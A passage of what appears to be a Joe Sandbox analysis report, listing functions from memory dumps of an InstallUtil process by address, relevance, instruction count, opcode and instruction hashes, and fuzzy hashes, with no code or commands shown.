                                                          • Opcode ID: 83e868dcf9b631c93474af0821a14d5289616f85a34c1d1a026b93c146b2a4fb
                                                          • Instruction ID: b9e9c78fab88d0cd83c33501a4517def9bed4d401908d21718e1c691768fef94
                                                          • Opcode Fuzzy Hash: 83e868dcf9b631c93474af0821a14d5289616f85a34c1d1a026b93c146b2a4fb
                                                          • Instruction Fuzzy Hash: CD626435A04214DFDB54EF58D955BAEB7B6FF89300F108099E90A9B395DB309D82CF50
                                                          Function 05135D08 Relevance: .8, Instructions: 818COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879194728.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5130000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 20365fb24b4f4823555e081a5263072695b192f053a08ccd50c3f43ad0be25ab
                                                          • Instruction ID: ebe5406fa48646e1ebb09cbb7a6d747908f2cf12cf0351a16a1b8f22597f9792
                                                          • Opcode Fuzzy Hash: 20365fb24b4f4823555e081a5263072695b192f053a08ccd50c3f43ad0be25ab
                                                          • Instruction Fuzzy Hash: FD728F75B141158FDB04EF98D965AAF77B6FF88304F118026E812AB399DF34AD42CB90
                                                          Function 05137C68 Relevance: .7, Instructions: 704COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879194728.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5130000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c4035bb6d78ca5a03a83d1f45a0b3575832e85e4c574b7bcff957463a81290b
                                                          • Instruction ID: bf4ef8b2ed1dfea063943da926706158a3de3a7d63e9879349fead51cce35d31
                                                          • Opcode Fuzzy Hash: 6c4035bb6d78ca5a03a83d1f45a0b3575832e85e4c574b7bcff957463a81290b
                                                          • Instruction Fuzzy Hash: 965291757041058FEB44EFA9D565A6EBBB6FB88304F118029F906AB399CF34DD42CB90
                                                          Function 05216F78 Relevance: .7, Instructions: 683COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ed702349bd22dbd66c4bad90f6de199ad1c4dd62035067c23a43c6cbbb44539
                                                          • Instruction ID: 9d7f73e10b58d1c71d118303e8980a0dd5921fc6764034d587ab32865c1b833f
                                                          • Opcode Fuzzy Hash: 3ed702349bd22dbd66c4bad90f6de199ad1c4dd62035067c23a43c6cbbb44539
                                                          • Instruction Fuzzy Hash: 66521675A101149FDB19DF68C984E69BBF2FF89304F1981A8E90A9B262CB31EC51DF44
                                                          Function 051D1170 Relevance: .6, Instructions: 608COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879540634.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_51d0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 313dc69b636079b59ff37af377481ce77d41f50e60afb6382db35fbc0644f389
                                                          • Instruction ID: 561462e7b9e622c1f96e853d154ac557f4ed970e659d2be304b12b34d386d3f5
                                                          • Opcode Fuzzy Hash: 313dc69b636079b59ff37af377481ce77d41f50e60afb6382db35fbc0644f389
                                                          • Instruction Fuzzy Hash: 2C429575B042049FDB54EFA5D894AAEB7B2FF89300F108169E9069B395DF30AD46CF90
                                                          Function 051DD0F0 Relevance: .5, Instructions: 503COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879540634.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_51d0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25e3b49c9e1a73d44edef01a580542c40cffe329854903e766f5dcd9caa618ec
                                                          • Instruction ID: 3e960ee81cba76a77509095d1e9d248f786f9d46b58c2b61aaa9ef95d60f7458
                                                          • Opcode Fuzzy Hash: 25e3b49c9e1a73d44edef01a580542c40cffe329854903e766f5dcd9caa618ec
                                                          • Instruction Fuzzy Hash: D3125434B142049FDB05FFA8D9949ADBBB6FF89300F508529E816AB359DF30AD45CB90
                                                          Function 05205A80 Relevance: .3, Instructions: 346COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879881702.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5200000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5019a54c9568cececb5a023661ec2f0187a903108c6bacc2edd35b33b18e503c
                                                          • Instruction ID: 90f30dfcfebe6bb0f2b5c39bf3addf83d5aca1565334bf73c08200d6d58bc75a
                                                          • Opcode Fuzzy Hash: 5019a54c9568cececb5a023661ec2f0187a903108c6bacc2edd35b33b18e503c
                                                          • Instruction Fuzzy Hash: 42D17F30B142149FDB05FF68D8549AEBBB7EFC9310B00811AE816AB399DF349D52CB91
                                                          Function 05205A70 Relevance: .3, Instructions: 344COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879881702.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5200000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d172aeb752f88c1525c6552692dcf010afe51ceddfff1d278fd5358585749ede
                                                          • Instruction ID: bb39d6a4cf3d483ad5aa5cddce806049086450ed27867d67cd9c7fbabab5d5a1
                                                          • Opcode Fuzzy Hash: d172aeb752f88c1525c6552692dcf010afe51ceddfff1d278fd5358585749ede
                                                          • Instruction Fuzzy Hash: 21D17F30B142049FDB05FB68D8549AEBBB7EFC9310B40411AE816AF399DF34AD52CB91
                                                          Function 00D56EA0 Relevance: .3, Instructions: 330COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3871136969.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d50000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1168fd30459743115b06846a10c7270906d3f3aa0c0fb34b297bef5662bcb7e
                                                          • Instruction ID: f41fc0721e42a2034a6e69eef20bb2ebd4624ad919c9a8b99c5c3dd02f49148d
                                                          • Opcode Fuzzy Hash: d1168fd30459743115b06846a10c7270906d3f3aa0c0fb34b297bef5662bcb7e
                                                          • Instruction Fuzzy Hash: 4FC18F71E046298FDF14CBA8D881AADF7F1FB98301F688569D855E7202D730ED46CBA0
                                                          Function 00D52D98 Relevance: .3, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3871136969.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d50000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92967362de4cb43421f2fc73ce4a1eb5f09b820004b41c1eeb9bd06891a9d22a
                                                          • Instruction ID: d65c17185eb2ddd7ae24e6e80d7cc54476a2691e5250d6fe08ebd7272d988174
                                                          • Opcode Fuzzy Hash: 92967362de4cb43421f2fc73ce4a1eb5f09b820004b41c1eeb9bd06891a9d22a
                                                          • Instruction Fuzzy Hash: 10A17034A04204DFDF04DB29E588B6A77F3FB89306F248065ED069B7A5C7349D89CB61
                                                          Function 00D52DA8 Relevance: .3, Instructions: 252COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3871136969.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d50000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95b100931690cd8a0dc0e91a7e5d31c3ce97fb8af6ccfff92e9c40b8899b3459
                                                          • Instruction ID: a3f15f8d7aa01e8cccd2fa4ef9c76023d382d1b7bdc8c1ca1e657ea321c37988
                                                          • Opcode Fuzzy Hash: 95b100931690cd8a0dc0e91a7e5d31c3ce97fb8af6ccfff92e9c40b8899b3459
                                                          • Instruction Fuzzy Hash: B1A17F34A04204DFDF04DB29E588B6A77F3FB89316F248065ED069B7A5C7349D89CB61
                                                          Function 05216C08 Relevance: .2, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a885da2d7aec9115385729baa8fe667e4effd38950eab61c90a661fb6fd1c54
                                                          • Instruction ID: 493a9bb11b62524fa5de4c54ab375bb9fd2a978b70a178e35dbbef12450edf4c
                                                          • Opcode Fuzzy Hash: 5a885da2d7aec9115385729baa8fe667e4effd38950eab61c90a661fb6fd1c54
                                                          • Instruction Fuzzy Hash: A6615B71A042468BE708EF7AF95169ABBE3FFCA300F14D129D406DB368EF7859058B51
                                                          Function 05216C18 Relevance: .2, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb6bfc120b7371198c2921d31cef0604d51346e6168ba597f83b6b1f85d609cd
                                                          • Instruction ID: 609ce45e5a8ec3bdfed2d02cdb5c1a3149ac0277b372d03aa23aaf7bd5ecc964
                                                          • Opcode Fuzzy Hash: cb6bfc120b7371198c2921d31cef0604d51346e6168ba597f83b6b1f85d609cd
                                                          • Instruction Fuzzy Hash: 46513B71A042468BEB08EF7AF95169ABBE3FFCA300F14D129D4069B368EF7459058B51
                                                          Function 04DE7C60 Relevance: 4.1, Instructions: 4052COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3878345480.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4de0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c314c47fea53a0e689072694de05cb67802ca9aa558d769360717958869e575b
                                                          • Instruction ID: 5abca6d4949b7703b99adee232ab707edee8bb9479f1e9dc12d0e0913713c2a0
                                                          • Opcode Fuzzy Hash: c314c47fea53a0e689072694de05cb67802ca9aa558d769360717958869e575b
                                                          • Instruction Fuzzy Hash: 0363B331F012268BDB647BA9856437EA5F7EBC8A40F5080AEDD06E7384EF34DC419B95
                                                          Function 052182B0 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %^Q$J&#n
                                                          • API String ID: 0-3207818096
                                                          • Opcode ID: 92ced4b4cb39254cd2eecfd1662ca8f227c75886b0d4096b16bf5f23ad291f25
                                                          • Instruction ID: d7652f9af4d8f79b153a8a51e936541d1590491e256eca9ee563084bad49adb3
                                                          • Opcode Fuzzy Hash: 92ced4b4cb39254cd2eecfd1662ca8f227c75886b0d4096b16bf5f23ad291f25
                                                          • Instruction Fuzzy Hash: 30A144B0815A448FD348DF1A9589BE1BBE0BF8A304F5A81FAD15D8F232EB318445DF45
                                                          Function 051D9540 Relevance: 1.8, Strings: 1, Instructions: 549COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879540634.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_51d0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID: 0-3916222277
                                                          • Opcode ID: 60835f8795f45f211d56dfa8e04c267a3b8d10de44f16f8ae6352a90beb0ffc8
                                                          • Instruction ID: 26da2d0a6de6dcdbee5e4d441f17ebdd83f21e0fc24555bf14a4c69c8cc7f646
                                                          • Opcode Fuzzy Hash: 60835f8795f45f211d56dfa8e04c267a3b8d10de44f16f8ae6352a90beb0ffc8
                                                          • Instruction Fuzzy Hash: 5512AD317141058FEB58EB69D4A5A6FB7A3FFC9600B148129E8079F398DF349C42CBA1
                                                          Function 05219B21 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: A
                                                          • API String ID: 0-3554254475
                                                          • Opcode ID: 8b80c51fcf76fdc32e1b96e6d0728c36e9c99775a158ab75c327a9c3b158719d
                                                          • Instruction ID: ede343dc84f1dc8fb45f84989d64ed0e771cd0d196526889186f97efda1db40d
                                                          • Opcode Fuzzy Hash: 8b80c51fcf76fdc32e1b96e6d0728c36e9c99775a158ab75c327a9c3b158719d
                                                          • Instruction Fuzzy Hash: F371C074604601CFC714EF68E594999BBF2FF89310B518169E80ADB3A5DB30EC46CF94
                                                          Function 00D54411 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3871136969.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d50000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: W
                                                          • API String ID: 0-655174618
                                                          • Opcode ID: 637202df1fa4269795d184639e459df87cfed053177eb5a00296b5f2b2420ca6
                                                          • Instruction ID: 901b1ccaf3001ddc6d095b8180ce1af4db48def03aa8e233ab0ed1705b14d9aa
                                                          • Opcode Fuzzy Hash: 637202df1fa4269795d184639e459df87cfed053177eb5a00296b5f2b2420ca6
                                                          • Instruction Fuzzy Hash: 2D718E38600601DFCB54EF29D584A99B7F2FF89315B158168E8059B3A5EB30EC45CFA1
                                                          Function 04DED590 Relevance: 1.3, Instructions: 1331COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3878345480.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4de0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c722b3803bbd2286952472d60e9c1192f259fe80c1789246e4b3dc1cf9ed85af
                                                          • Instruction ID: 925f033e14e678343a5fff6ba174d4ab49418bf698f27d46651e8bafd567962b
                                                          • Opcode Fuzzy Hash: c722b3803bbd2286952472d60e9c1192f259fe80c1789246e4b3dc1cf9ed85af
                                                          • Instruction Fuzzy Hash: 4FB29430B102159BE714AB9AC859BBEBBFAAFC5700F10446DE7069B294DF749E80CF51
                                                          Function 051D7498 Relevance: .8, Instructions: 799COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879540634.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_51d0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 502e5ea568f658e34a5ab7bce157bba00536769d7cf3cd23b995cb0936f69e86
                                                          • Instruction ID: 3e2d5b253a2ecc92d2ddab18bcdc92e3e673bf45e19f8ba054ae739cb66264ae
                                                          • Opcode Fuzzy Hash: 502e5ea568f658e34a5ab7bce157bba00536769d7cf3cd23b995cb0936f69e86
                                                          • Instruction Fuzzy Hash: C0820C74A102199FDB65DF68D950B9EB7B2FF89300F108199E809AB395DF30AE85CF50
                                                          Function 05218AF0 Relevance: .8, Instructions: 776COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 75fe16c091bf99f04a3222d6f8f2419dfa159776562802e32cbcfb8ef1892144
                                                          • Instruction ID: 7d08918b2371e7c28d12e50ec8e9375c456dffdc499fca2286143a0743f5c014
                                                          • Opcode Fuzzy Hash: 75fe16c091bf99f04a3222d6f8f2419dfa159776562802e32cbcfb8ef1892144
                                                          • Instruction Fuzzy Hash: 976282317142068BEB54EF68D56469FB7B2FF89704F108069E80BAB399DF349D468B90
                                                          Function 05218D3E Relevance: .6, Instructions: 607COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc0b7350a18af74973a784e43b51a48685ebb989bedc7fe1ad095f2b029fef79
                                                          • Instruction ID: 4ecdfbe2e2d18d251e9883dcb020725b52a344f7007ad1075f14174f0f60ee29
                                                          • Opcode Fuzzy Hash: bc0b7350a18af74973a784e43b51a48685ebb989bedc7fe1ad095f2b029fef79
                                                          • Instruction Fuzzy Hash: FC3292317141068BEB55BF68E5646AFB7B3EFC9705F108019E917AB398CF389D428B90
                                                          Function 05218DB8 Relevance: .6, Instructions: 583COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f117fbcb49173db24f95cbe4804280c8929105868097429ba52e9be42877bea
                                                          • Instruction ID: d8021e74e5a21b2cbe665deba68d74396420f8bc6d33a47c1a572990604e8d13
                                                          • Opcode Fuzzy Hash: 8f117fbcb49173db24f95cbe4804280c8929105868097429ba52e9be42877bea
                                                          • Instruction Fuzzy Hash: EB3281317141068BEB55BF68E5646AFB7B3EFC9705F108019E817AB398CF389D468B90
                                                          Function 051D5318 Relevance: .6, Instructions: 575COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879540634.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_51d0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9aa8e582573a69068577aaccd9a083dbdcc1c6f333a45c232da3cc8c1126851
                                                          • Instruction ID: 2c7407c10adb1d676a1ea432b28be4b980c55ebe4312afd453af428537eab339
                                                          • Opcode Fuzzy Hash: b9aa8e582573a69068577aaccd9a083dbdcc1c6f333a45c232da3cc8c1126851
                                                          • Instruction Fuzzy Hash: EE326335B14104CFEB49EBA8D95595EBBB7FF88305F118119E916AB398CF30AD42CB90
                                                          Function 05218DEC Relevance: .6, Instructions: 572COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abda6979a5cdd2ecb85b51dbde65cddef1597c2783a75353e0c24bcb7fcaa52f
                                                          • Instruction ID: 7ef288701419390fca9a26408d69397ae9ea87645ec7b6046bd3e7b26a95c22a
                                                          • Opcode Fuzzy Hash: abda6979a5cdd2ecb85b51dbde65cddef1597c2783a75353e0c24bcb7fcaa52f
                                                          • Instruction Fuzzy Hash: E83291317141068BEB55BF68E5646AFB7B2EFC8705F10C019E817AB398CF389D468B90
                                                          Function 05218E4A Relevance: .6, Instructions: 551COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a973ac2c636834c5fccf2cac0091e5819add3c9209a1c38015554bf360ddff2
                                                          • Instruction ID: 0f99193dd514de86f43973052e0a0af8a3a13d352eb46cc0e1e5f244e31f523d
                                                          • Opcode Fuzzy Hash: 8a973ac2c636834c5fccf2cac0091e5819add3c9209a1c38015554bf360ddff2
                                                          • Instruction Fuzzy Hash: CB22A1317141068BEB55FB68D5646AFB7B2EFC8305F108029E817AB398DF389D468B90
                                                          Function 0513E7F0 Relevance: .5, Instructions: 476COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879194728.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5130000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 03c6b09273c0f19dfbf988c139c3d0dd42907cea2a92ad64d4e161ca59f1bc5d
                                                          • Instruction ID: 02bdd790e01b656cd2b989b8f337bb3c5fa944c728732b526d9cfe044b2cb174
                                                          • Opcode Fuzzy Hash: 03c6b09273c0f19dfbf988c139c3d0dd42907cea2a92ad64d4e161ca59f1bc5d
                                                          • Instruction Fuzzy Hash: 530290317182018BEB54EF28D96662F77AAEF89304F148129F916DB3D8DF38DD418B90
                                                          Function 051DD0E1 Relevance: .4, Instructions: 358COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879540634.00000000051D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_51d0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d7b44945b3bc47d1aa907b158bb91e786dcc58c524c528f44ebddf1aae88137
                                                          • Instruction ID: f9a28fa271b688f040896144507ec35ce24917717af90279bdbd22f0e9a66158
                                                          • Opcode Fuzzy Hash: 3d7b44945b3bc47d1aa907b158bb91e786dcc58c524c528f44ebddf1aae88137
                                                          • Instruction Fuzzy Hash: 6FE15134B142049FDB04FFA9E9549AEB7B6FF89300F508529E816AB359DF309D46CB90
                                                          Function 05219B50 Relevance: .4, Instructions: 352COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879998056.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5210000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2bf4cffeb07037d6fbddf854def387510f3b69b827b6f4157fc36700b23e50d4
                                                          • Instruction ID: a1603de880c295b8951850506496d3c2ecd8249c8d02aedb5546ecc58bde883d
                                                          • Opcode Fuzzy Hash: 2bf4cffeb07037d6fbddf854def387510f3b69b827b6f4157fc36700b23e50d4
                                                          • Instruction Fuzzy Hash: EFE1F171A24301CFC700DF68E555AAABBF2FFA9311B118069E806DB3A5DF709C41CB98
                                                          Function 05203940 Relevance: .3, Instructions: 329COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879881702.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5200000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e4eb92662e5b1262ceebccb84d6cfae42ab2e68e047e87620a8f697550c7d0a5
                                                          • Instruction ID: 7219860e948dc147d10238286f88d7f5851506d9a4ed00acb04b746e88106f3a
                                                          • Opcode Fuzzy Hash: e4eb92662e5b1262ceebccb84d6cfae42ab2e68e047e87620a8f697550c7d0a5
                                                          • Instruction Fuzzy Hash: 79D1F834B14118DFDB04FBA8DD949AEB7B6FF89310F10852AD816AB359DB316D42CB90
                                                          Function 05203930 Relevance: .3, Instructions: 316COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3879881702.0000000005200000.00000040.00000800.00020000.00000000.sdmp, Offset: 05200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_5200000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb4e71dc90a48233545b38ee4b68ce156c875fc8a5e69576f8ad127d5a9d0817
                                                          • Instruction ID: 122af3bbcab5b911fa9c6c34755187734f59de02578f24e8b04e0f7f28a6161a
                                                          • Opcode Fuzzy Hash: cb4e71dc90a48233545b38ee4b68ce156c875fc8a5e69576f8ad127d5a9d0817
                                                          • Instruction Fuzzy Hash: 93D1F834B14118DFDB04FBA8DD949AEB7B6FF89300F10411AD816AB359DB316D42CB90
                                                          Function 04DEB7B0 Relevance: .3, Instructions: 314COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3878345480.0000000004DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_4de0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 042abe34f19f0838ccca3dfe2eec79d158550cf41624bff85f6ad04419f33f40
                                                          • Instruction ID: 75b08184d11fdf70e07c8fa108c6c9e2f24e05b3388dbf7512f72d55d8f7f1d8
                                                          • Opcode Fuzzy Hash: 042abe34f19f0838ccca3dfe2eec79d158550cf41624bff85f6ad04419f33f40
                                                          • Instruction Fuzzy Hash: 44B15A35B006078B9B56FF6AD46427EBAA3FBC9610764452ED806D7384EF34FD068B42
                                                          Function 00D5B9F8 Relevance: .3, Instructions: 306COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3871136969.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_d50000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5774b64f02b7fb3654c6b179eaffc8c294a28557830ea92a725169812bbc137
